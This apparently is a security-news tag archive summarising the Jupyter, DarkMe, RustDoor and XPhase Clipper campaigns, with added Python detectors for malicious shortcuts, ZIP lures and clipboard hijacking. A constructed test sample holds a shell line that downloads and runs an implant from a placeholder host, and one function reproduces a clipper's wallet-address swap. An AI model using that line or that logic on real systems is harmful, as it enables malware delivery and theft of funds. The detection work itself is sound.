Tag Archive for: Targets

Jupyter Malware Variant Targets Browsers, Crypto-Wallets with Sophisticated Evasion Techniques


Security researchers have identified a significant uptick in attacks by a new, more sophisticated variant of the Jupyter malware, targeting popular browsers and crypto-wallets with advanced evasion techniques. This variant, also known as Yellow Cockatoo, Solarmarker, and Polazert, has been active since at least 2020 but has seen a resurgence with enhancements that make it harder to detect.

A Persistent Data-Stealing Cyber Threat

VMware’s Carbon Black team recently observed the malware leveraging PowerShell command modifications and legitimate-looking, digitally signed payloads to infect a growing number of systems. These modifications enhance Jupyter’s evasion capabilities, allowing it to backdoor machines and harvest a variety of credential information without detection. Morphisec and BlackBerry have further detailed its capabilities, including support for command and control communications and the execution of PowerShell scripts and commands, highlighting its function as a full-fledged backdoor.

Jupyter: Getting Around Malware Detection

The recent attacks have seen the Jupyter operator using valid certificates to digitally sign the malware, making it appear legitimate to malware detection tools. VMware researchers noted the malware’s use of SEO poisoning and search engine redirects as part of its attack chain, alongside its credential harvesting and encrypted command-and-control communication. Abe Schneider, threat analyst lead at Carbon Black, highlighted new improvements to the infostealer, including the use of the Inno Setup installer as the first payload delivered to victim devices.

A Troubling Increase in Infostealers

Jupyter’s resurgence is part of a broader, concerning trend in the rise of infostealers, exacerbated by the shift to remote work during the COVID-19 pandemic. Organizations like Red Canary and Uptycs have reported sharp increases in infostealer distribution, with attackers leveraging the malware to gain quick, persistent, and privileged access to enterprise networks and systems. The demand for stolen data on criminal forums remains high, underscoring the ongoing threat posed…

Source…

DarkMe Malware Targets Traders Using Microsoft SmartScreen Zero-Day Vulnerability


Feb 14, 2024 | Newsroom | Zero-Day / Financial Sector Security


A newly disclosed security flaw in Microsoft Defender SmartScreen has been exploited as a zero-day by an advanced persistent threat actor called Water Hydra (aka DarkCasino) targeting financial market traders.

Trend Micro, which began tracking the campaign in late December 2023, said it entails the exploitation of CVE-2024-21412, a security bypass vulnerability related to Internet Shortcut Files (.URL).

“In this attack chain, the threat actor leveraged CVE-2024-21412 to bypass Microsoft Defender SmartScreen and infect victims with the DarkMe malware,” the cybersecurity firm said in a Tuesday report.

Microsoft, which addressed the flaw in its February Patch Tuesday update, said an unauthenticated attacker could exploit the flaw by sending the targeted user a specially crafted file in order to bypass displayed security checks.


However, successful exploitation banks on the prerequisite that the threat actor convinces the victim to click on the file link to view the attacker-controlled content.

The infection chain documented by Trend Micro weaponizes CVE-2024-21412 to drop a malicious installer file (“7z.msi”) once the victim clicks a booby-trapped URL (“fxbulls[.]ru”) distributed via forex trading forums under the pretext of sharing a link to a stock chart image; the link in reality leads to an internet shortcut file (“photo_2023-12-29.jpg.url”).

“The landing page on fxbulls[.]ru contains a link to a malicious WebDAV share with a filtered crafted view,” security researchers Peter Girnus, Aliakbar Zahravi, and Simon Zuckerbraun said.

“When users click on this link, the browser will ask them to open the link in Windows Explorer. This is not a security prompt, so the user might not think that this link is malicious.”

The clever trick that makes this possible is the threat actor’s abuse of the search: application protocol, which is used for calling the desktop search application on Windows and has been abused in the past to deliver malware.

The rogue internet shortcut file, for its part, points to another internet shortcut file hosted on a remote server (“2.url”), which, in turn, points to a CMD shell script within a ZIP archive…
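The shortcut-chaining described above leaves static traces a defender can look for without opening anything: an Internet Shortcut is a small INI file whose URL= value can point at a remote share, at another .url file, at a script, or at a protocol handler. The following triage script is an added example and is not Trend Micro’s tooling; the sample files, the 203.0.113.10 address (documentation range) and the “search.url” case, which assumes the search: handler is placed directly in a shortcut rather than on a landing page, are all constructed for illustration.

```python
"""Triage Internet Shortcut (.url) files for the traits described in the
Water Hydra / CVE-2024-21412 chain: a double extension that disguises the
shortcut, a target on a remote (UNC / WebDAV) share, a target that is
itself another .url file, a target that is a script or executable, and a
target that invokes the Windows search: protocol handler.
Added example, not Trend Micro's tooling; the sample files and the
203.0.113.10 address (documentation range) are constructed."""
import re
from urllib.parse import urlsplit

DISGUISE_RE = re.compile(r"\.(jpe?g|png|gif|pdf|docx?|xlsx?)\.url$", re.I)
PAYLOAD_RE = re.compile(r"\.(cmd|bat|ps1|vbs|js|exe|msi|hta)$", re.I)


def parse_url_file(text: str) -> dict:
    """Return the key/value pairs of the [InternetShortcut] section (INI style)."""
    fields, section = {}, None
    for raw in text.lstrip("\ufeff").splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].lower()
        elif section == "internetshortcut" and "=" in line:
            key, _, value = line.partition("=")
            fields[key.strip().lower()] = value.strip()
    return fields


def assess(filename: str, text: str) -> list:
    """Return human-readable findings; an empty list means nothing unusual."""
    findings = []
    target = parse_url_file(text).get("url", "")
    if not target:
        return ["no URL= value in [InternetShortcut]"]
    parts = urlsplit(target)
    scheme = parts.scheme.lower()
    path = parts.path or target  # UNC targets have no scheme; keep the raw string
    if DISGUISE_RE.search(filename):
        findings.append("double extension disguises the shortcut as an image/document")
    if scheme in ("search", "search-ms"):
        findings.append("target invokes the Windows search: protocol handler")
    # file://host/share and \\host\share (including the \\host@80\DavWWWRoot
    # WebDAV form) point at a remote share rather than a local file.
    if (scheme == "file" and parts.netloc) or target.startswith("\\\\"):
        findings.append("target is on a remote UNC/WebDAV share")
    if path.lower().endswith(".url"):
        findings.append("target is another .url shortcut (shortcut chaining)")
    if PAYLOAD_RE.search(path):
        findings.append("target is a script or executable")
    return findings


# Constructed samples modelled on the reported chain (not real artefacts).
SAMPLES = {
    "photo_2023-12-29.jpg.url":
        "[InternetShortcut]\r\nURL=file://203.0.113.10@80/DavWWWRoot/2.url\r\n",
    "2.url":
        "[InternetShortcut]\r\nURL=file://203.0.113.10@80/DavWWWRoot/7z.zip\\start.cmd\r\n",
    "search.url":
        "[InternetShortcut]\r\nURL=search:query=chart&crumb=location:\\\\203.0.113.10@80\\DavWWWRoot\r\n",
    "docs.url":
        "[InternetShortcut]\r\nURL=https://learn.microsoft.com/\r\n",
}


def triage_all(samples: dict = SAMPLES) -> dict:
    """Assess every sample and map file name to its findings."""
    return {name: assess(name, body) for name, body in samples.items()}


if __name__ == "__main__":
    for name, findings in triage_all().items():
        print(f"{name}: {'; '.join(findings) or 'nothing unusual'}")
```

An ordinary shortcut to an https:// site produces no findings, so the rules are specific to the remote-share, chaining and handler tricks rather than to shortcuts in general; run it over a mail gateway’s quarantined attachments or a user’s Downloads folder to surface candidates for closer inspection.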

Source…

RustDoor macOS Backdoor Targets Cryptocurrency Firms with Fake Job Offers


Feb 16, 2024 | Newsroom | Endpoint Security / Cryptocurrency


Several companies operating in the cryptocurrency sector are the target of a newly discovered Apple macOS backdoor codenamed RustDoor.

RustDoor was first documented by Bitdefender last week, which described it as Rust-based malware capable of harvesting and uploading files, as well as gathering information about the infected machines. It is distributed by masquerading as a Visual Studio update.

While prior evidence uncovered at least three different variants of the backdoor, the exact initial propagation mechanism remained unknown.

That said, the Romanian cybersecurity firm subsequently told The Hacker News that the malware was used as part of a targeted attack rather than a shotgun distribution campaign, noting that it found additional artifacts that are responsible for downloading and executing RustDoor.


“Some of these first stage downloaders claim to be PDF files with job offerings, but in reality, are scripts that download and execute the malware while also downloading and opening an innocuous PDF file that bills itself as a confidentiality agreement,” Bogdan Botezatu, director of threat research and reporting at Bitdefender, said.

Since then, three more malicious samples that act as first-stage payloads have come to light, each of them purporting to be a job offering. These ZIP archives predate the earlier RustDoor binaries by nearly a month.

The new component of the attack chain – i.e., the archive files (“Jobinfo.app.zip” or “Jobinfo.zip”) – contains a basic shell script that’s responsible for fetching the implant from a website named turkishfurniture[.]blog. It’s also engineered to preview a harmless decoy PDF file (“job.pdf”) hosted on the same site as a distraction.
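A lure of this shape can be caught statically: a .app bundle inside a ZIP whose executable under Contents/MacOS is a shell script rather than a Mach-O binary, and whose script fetches content over HTTP and opens a PDF. The triage function below is an added example, not Bitdefender’s tooling; the archive is constructed in memory and the hosts it references use the reserved .invalid TLD rather than the domain named in the report.

```python
"""Static triage for a ZIP that claims to carry a job offer but contains a
macOS .app bundle whose executable is a shell script rather than a Mach-O
binary. Added example modelled on the Jobinfo.app.zip description; it is
not Bitdefender's tooling. The archive is constructed in memory and the
hosts it mentions use the reserved .invalid TLD."""
import io
import re
import zipfile

MACHO_MAGICS = (b"\xfe\xed\xfa\xce", b"\xfe\xed\xfa\xcf",
                b"\xce\xfa\xed\xfe", b"\xcf\xfa\xed\xfe", b"\xca\xfe\xba\xbe")
URL_RE = re.compile(r"https?://[^\s'\"]+")
DECOY_RE = re.compile(r"\bopen\b[^\n]*\.pdf")


def build_constructed_sample() -> bytes:
    """A lookalike of the described lure: an .app whose 'binary' is a shell
    script that fetches a decoy PDF and then the implant (constructed)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("Jobinfo.app/Contents/Info.plist", "<plist version=\"1.0\"/>")
        z.writestr(
            "Jobinfo.app/Contents/MacOS/Jobinfo",
            "#!/bin/sh\n"
            "curl -s http://decoy.invalid/job.pdf -o /tmp/job.pdf && open /tmp/job.pdf\n"
            "curl -s http://decoy.invalid/implant -o /tmp/.upd && chmod +x /tmp/.upd && /tmp/.upd &\n",
        )
    return buf.getvalue()


def build_clean_sample() -> bytes:
    """A benign archive holding only a PDF, for comparison (constructed)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("job.pdf", b"%PDF-1.4\n%constructed placeholder\n")
    return buf.getvalue()


def triage_zip(data: bytes) -> dict:
    """Inspect bundle executables inside the ZIP and summarise what they do."""
    report = {"script_executables": [], "native_executables": [],
              "urls": [], "decoy_opened": False, "verdict": "clean"}
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        for info in z.infolist():
            name = info.filename
            # Bundle executables live under <bundle>.app/Contents/MacOS/
            if ".app/Contents/MacOS/" not in name or name.endswith("/"):
                continue
            body = z.read(name)
            if body.startswith(MACHO_MAGICS):
                report["native_executables"].append(name)
            elif body.startswith(b"#!"):
                text = body.decode("utf-8", "replace")
                report["script_executables"].append(name)
                report["urls"].extend(URL_RE.findall(text))
                report["decoy_opened"] |= bool(DECOY_RE.search(text))
    # A script standing in for the app binary that also reaches out over
    # HTTP is the combination worth escalating.
    if report["script_executables"] and report["urls"]:
        report["verdict"] = "suspicious"
    return report


if __name__ == "__main__":
    print(triage_zip(build_constructed_sample()))
    print(triage_zip(build_clean_sample()))
```

A native Mach-O executable is recorded but not flagged by itself, since that is what a legitimate bundle contains; the signal here is the script-as-binary pattern combined with network fetches, which is exactly what a downloader that also opens a decoy document looks like on disk.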


Bitdefender said it also detected four new Golang-based binaries that communicate with an actor-controlled domain (“sarkerrentacars[.]com”), whose purpose is to “collect information about the victim’s machine and its network connections using the system_profiler and networksetup utilities, which are part of the macOS operating system.”

In addition, the binaries are capable of extracting details about the disk via “diskutil list” as well…

Source…

XPhase Clipper Malware Campaign Targets Crypto Users


A new strain of malware dubbed XPhase Clipper has been stealthily targeting cryptocurrency users. This Clipper malware infiltrates unsuspecting victims’ systems through deceptive websites masquerading as authentic cryptocurrency platforms. 

[Figure: XPhase Clipper Malware (Source: Cyble)]

Cybersecurity experts at Cyble Research and Intelligence Labs (CRIL) have found this concerning trend where a large-scale operation is using cloned YouTube videos to target unsuspecting victims on the internet.

This is a condensed version of the report, shedding light on the modus operandi and infection chain of the XPhase Clipper malware.

Understanding the XPhase Clipper Malware Campaign

[Figure: XPhase Clipper Malware Campaign (Source: Cyble)]

Clipper malware poses a serious threat to cryptocurrency users by pilfering sensitive information, particularly cryptocurrency wallet addresses, from the clipboard. 

With the increasing popularity of cryptocurrencies like Bitcoin and Ethereum, cybercriminals are increasingly targeting users in order to steal their funds.

XPhase Clipper represents a sophisticated iteration of this malware strain, designed to intercept and manipulate copied cryptocurrency wallet addresses, rerouting funds to the attackers’ accounts. 
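The mechanism in the paragraph above is simple enough to show end to end: the clipper classifies whatever lands on the clipboard, and if it looks like a wallet address it writes back an attacker address of the same coin type so the paste still looks plausible. The same property gives defenders a check, since a wallet address that turns into a different address of the same type within a fraction of a second is not something a person copying twice produces. The code below is an added example and is not from the Cyble report; the address patterns are format-only (no checksum validation), and every address and clipboard event in it is constructed.

```python
"""How a clipboard hijacker ("clipper") works, and a check for it.
Added example; address shapes are simplified (format only, no checksum)
and every address and event below is constructed, not taken from the
Cyble report."""
import re

# Format-only checks: legacy Bitcoin, bech32 Bitcoin, Ethereum.
ADDRESS_PATTERNS = {
    "btc_legacy": re.compile(r"^[13][a-km-zA-HJ-NP-Z1-9]{25,34}$"),
    "btc_bech32": re.compile(r"^bc1[ac-hj-np-z02-9]{25,62}$"),
    "eth": re.compile(r"^0x[0-9a-fA-F]{40}$"),
}

# Constructed attacker addresses, one per type this clipper cares about.
ATTACKER_ADDRESSES = {
    "btc_legacy": "1ExampLeAttacKerAddr3ss7xyzABCDEF",
    "eth": "0x" + "deadbeef" * 5,
}


def classify(text: str):
    """Return the address type of the clipboard text, or None."""
    s = text.strip()
    for kind, pattern in ADDRESS_PATTERNS.items():
        if pattern.match(s):
            return kind
    return None


def clipper_rewrite(clipboard: str) -> str:
    """The hijack step: swap in the attacker address of the same type,
    leaving anything that is not a known address untouched."""
    return ATTACKER_ADDRESSES.get(classify(clipboard), clipboard)


def simulate_session(user_copies, clipper_delay=0.2):
    """Replay user copy events (t, text) through the clipper; each swap shows
    up as a second snapshot clipper_delay seconds after the user's copy."""
    snapshots = []
    for t, text in user_copies:
        snapshots.append((t, text))
        rewritten = clipper_rewrite(text)
        if rewritten != text:
            snapshots.append((t + clipper_delay, rewritten))
    return snapshots


def detect_swaps(snapshots, window=2.0):
    """Flag consecutive snapshots where one wallet address becomes a
    different address of the same type within `window` seconds."""
    alerts = []
    for (t0, a), (t1, b) in zip(snapshots, snapshots[1:]):
        ka, kb = classify(a), classify(b)
        if ka is not None and ka == kb and a != b and (t1 - t0) <= window:
            alerts.append({"time": t1, "kind": ka, "original": a, "replacement": b})
    return alerts


# Constructed victim activity: a note, two addresses the clipper swaps, and
# two bech32 addresses copied a hundred seconds apart that must not alert.
USER_COPIES = [
    (0.0, "see you at 10"),
    (5.0, "1VictimWaLLetAddr4Payment9mnpqrstuv"),
    (70.0, "0xabcdef0123456789abcdef0123456789abcdef01"),
    (300.0, "bc1qexampleaddressmade4testsxxxx"),
    (400.0, "bc1qsecndaddressmade4testsyyyy"),
]


def run() -> list:
    """Drive the constructed session through the clipper and the detector."""
    return detect_swaps(simulate_session(USER_COPIES))


if __name__ == "__main__":
    for alert in run():
        print(alert)
```

Two details matter for a real deployment: the detector works on clipboard snapshots, so it needs a clipboard monitor feeding it (not shown), and the time window is what separates a hijack from a user who legitimately copies a second address a minute later, which is why the bech32 pair in the constructed session raises nothing.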

The threat actors behind the XPhase Clipper malware campaign are exclusively targeting cryptocurrency users worldwide, deploying a series of deceptive tactics to ensnare victims. 

[Figure: XPhase Clipper Malware Campaign (Source: Cyble)]

Notably, phishing sites impersonating reputable platforms such as Metamask and Wazirx have emerged as conduits for spreading the XPhase Clipper payload.

[Figure: XPhase Clipper (Source: Cyble)]

These malicious sites lure users into downloading a zip file housing an array of malicious components, including a dropper executable, VB Script, and Batch script files, culminating in the execution of the clipper payload in the form of a DLL file.

[Figure: Clipper Malware (Source: Cyble)]

XPhase Clipper Malware Targets Indian Crypto Users 

Upon closer examination, CRIL found that the infection chain is meticulously orchestrated, with each stage serving to conceal the malicious activities of the XPhase Clipper. 

The VB Script plays an important role in facilitating the download and execution of the clipper payload, while the Batch script ensures persistence by adding a registry…

Source…